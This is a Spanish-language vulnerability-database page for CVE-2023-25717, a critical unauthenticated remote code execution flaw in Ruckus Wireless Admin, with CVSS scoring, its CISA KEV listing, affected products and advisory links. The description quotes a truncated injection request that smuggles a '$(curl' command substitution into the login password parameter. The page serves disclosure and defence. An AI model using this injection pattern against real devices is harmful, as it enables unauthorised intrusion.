← Volver a CVEs
CVE-2023-25717
CRITICALCISA KEV9.8
Descripcion
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Detalles CVE
Puntuacion CVSS v3.19.8
SeveridadCRITICAL
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vector de ataqueNETWORK
ComplejidadLOW
Privilegios requeridosNONE
Interaccion usuarioNONE
Publicado2/13/2023
Ultima modificacion11/3/2025
Fuentekev
Avistamientos honeypot0
CISA KEV
VendedorRuckus Wireless
ProductoMultiple Products
Nombre vulnerabilidadMultiple Ruckus Wireless Products CSRF and RCE Vulnerability
Fecha inclusion KEV2023-05-12
Fecha limite remediacion2023-06-02
Uso en ransomwareUnknown
Productos afectados
commscope:ruckus_smartzone_firmwareruckuswireless:e510ruckuswireless:h320ruckuswireless:h350ruckuswireless:h500ruckuswireless:h510ruckuswireless:h550ruckuswireless:m510ruckuswireless:m510-jpruckuswireless:p300ruckuswireless:q410ruckuswireless:q710ruckuswireless:q910ruckuswireless:r300ruckuswireless:r310ruckuswireless:r320ruckuswireless:r350ruckuswireless:r500ruckuswireless:r510ruckuswireless:r550ruckuswireless:r560ruckuswireless:r600ruckuswireless:r610ruckuswireless:r650ruckuswireless:r700ruckuswireless:r710ruckuswireless:r720ruckuswireless:r730ruckuswireless:r750ruckuswireless:r760ruckuswireless:r850ruckuswireless:ruckus_wireless_adminruckuswireless:smartzone_apruckuswireless:sz-144ruckuswireless:sz-144-federalruckuswireless:sz100ruckuswireless:sz300ruckuswireless:sz300-federalruckuswireless:t300ruckuswireless:t301nruckuswireless:t301sruckuswireless:t310cruckuswireless:t310druckuswireless:t310nruckuswireless:t310sruckuswireless:t350cruckuswireless:t350druckuswireless:t350seruckuswireless:t504ruckuswireless:t610ruckuswireless:t710ruckuswireless:t710sruckuswireless:t750ruckuswireless:t750seruckuswireless:t811-cmruckuswireless:t811-cm\(non-spf\)ruckuswireless:zd1000ruckuswireless:zd1100ruckuswireless:zd1200ruckuswireless:zd3000ruckuswireless:zd5000
Debilidades (CWE)
CWE-94CWE-94
Referencias
https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/(cve@mitre.org)
https://support.ruckuswireless.com/security_bulletins/315(cve@mitre.org)
https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/(af854a3a-2127-422b-91ae-364da2661108)
https://support.ruckuswireless.com/security_bulletins/315(af854a3a-2127-422b-91ae-364da2661108)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717(134c704f-9b21-4f2e-91b3-4a467353bcc0)
Correlaciones IOC
Sin correlaciones registradas
This product uses data from the NVD API but is not endorsed or certified by the NVD.